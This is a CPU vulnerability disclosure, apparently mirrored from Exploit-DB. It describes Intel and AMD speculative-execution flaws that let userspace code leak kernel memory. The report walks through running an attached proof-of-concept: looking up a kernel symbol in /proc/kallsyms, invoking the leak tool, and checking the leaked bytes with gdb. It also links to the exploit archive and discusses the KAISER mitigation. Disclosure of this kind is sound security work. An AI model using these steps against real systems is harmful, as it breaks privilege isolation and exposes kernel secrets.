== INTRODUCTION ==
This is a bug report about a CPU security issue that affects
processors by Intel, AMD and (to some extent) ARM.

I have written a PoC for this issue that, when executed in userspace
on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
can leak around 2000 bytes per second from Linux kernel memory after a
~4-second startup, in a 4GiB address space window, with the ability to
read from random offsets in that window. The same thing also works on
an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.

On the Intel CPU, I also have preliminary results that suggest that it
may be possible to leak host memory (which would include memory owned
by other guests) from inside a KVM guest.

The attack doesn't seem to work as well on ARM - perhaps because ARM
CPUs don't perform as much speculative execution because of a
different performance-energy-tradeoff or so?

All PoCs are written against specific processors and will likely
require at least some adjustments before they can run in other
environments, e.g. because of hardcoded timing tresholds.

############################################################

On the following Intel CPUs (the only ones tested so far), we managed
to leak information using another variant of this issue ("variant 3").
So far, we have not managed to leak information this way on AMD or ARM CPUs.

 - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
 - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)

Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
speculative execution have something like the following behavior:

 - If the address is not mapped (perhaps also under other
   conditions?), instructions that depend on the load are not executed.
 - If the address is mapped, but not sufficiently cached, the load loads zeroes.
   Instructions that depend on the load are executed.
   Perhaps Intel decided that in case of a sufficiently high-latency load,
   it makes sense to speculate ahead with a dummy value to get a chance to
   prefetch cachelines for dependent loads, or something like that?
 - If the address is sufficiently cached, the load loads the data stored at the
   given address, without respecting the privilege level.
   Instructions that depend on the load are executed.
   This is the vulnerable case.


I have attached a PoC that works on both tested Intel systems, named
intel_kernel_read_poc.tar. Usage:

As root, determine where the core_pattern is in the kernel:

=====
# grep core_pattern /proc/kallsyms
ffffffff81e8aea0 D core_pattern
=====

Then, as a normal user, unpack the PoC and use it to leak the
core_pattern (and potentially other cached things around it) from
kernel memory, using the pointer from the previous step:

=====
$ cat /proc/sys/kernel/core_pattern
/cores/%E.%p.%s.%t
$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
ffffffff81e8aea0  2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e
|/cores/%E.%p.%s.|
ffffffff81e8aeb0  25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20
|%t.apport %p %s |
ffffffff81e8aec0  25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00  |%c
%P...........|
[ zeroes ]
ffffffff81e8af20  c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff
|................|
ffffffff81e8af30  20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff  |
.......u.......|
[ zeroes ]
ffffffff81e8bb60  65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00
|e[..............|
ffffffff81e8bb70  00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00
|....mA..........|
[ zeroes ]

real 0m13.726s
user 0m9.820s
sys 0m3.908s
=====

As you can see, the core_pattern, part of the previous core_pattern (behind the
first nullbyte) and a few kernel pointers were leaked.

To confirm whether other leaked kernel data was leaked correctly, use gdb as
root to read kernel memory:

=====
# gdb /bin/sleep /proc/kcore
[...]
(gdb) x/4gx 0xffffffff81e8af20
0xffffffff81e8af20: 0xffffffff81e8a4c0 0xffffffff81e8afc0
0xffffffff81e8af30: 0xffffffff81f08e20 0xffffffff81cdd975
(gdb) x/4gx 0xffffffff81e8bb60
0xffffffff81e8bb60: 0xffffffff81cf5b65 0x0000000000000000
0xffffffff81e8bb70: 0x0000416d00000000 0x0000000000000000
=====

Note that the PoC will report uncached bytes as zeroes.


To Intel:
Please tell me if you have trouble reproducing this issue.
Given how different my two test machines are, I would be surprised if this
didn't just work out of the box on other CPUs from the same generation.
This PoC doesn't have hardcoded timings or anything like that.

We have not yet tested whether this still works after a TLB flush.


Regarding possible mitigations:

A short while ago, Daniel Gruss presented KAISER:
https://gruss.cc/files/kaiser.pdf
https://lkml.org/lkml/2017/5/4/220 (cached:
https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
)
https://github.com/IAIK/KAISER

Basically, the issue that KAISER tries to mitigate is that on Intel
CPUs, the timing of a pagefault reveals whether the address is
unmapped or mapped as kernel-only (because for an unmapped address, a
pagetable walk has to occur while for a mapped address, the TLB can be
used). KAISER duplicates the top-level pagetables of all processes and
switches them on kernel entry and exit. The kernel's top-level
pagetable looks as before. In the top-level pagetable used while
executing userspace code, most entries that are only used by the
kernel are zeroed out, except for the kernel text and stack that are
necessary to execute the syscall/exception entry code that has to
switch back the pagetable.

I suspect that this approach might also be usable for mitigating
variant 3, but I don't know how much TLB flushing / data cache
flushing would be necessary to make it work.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43490.zip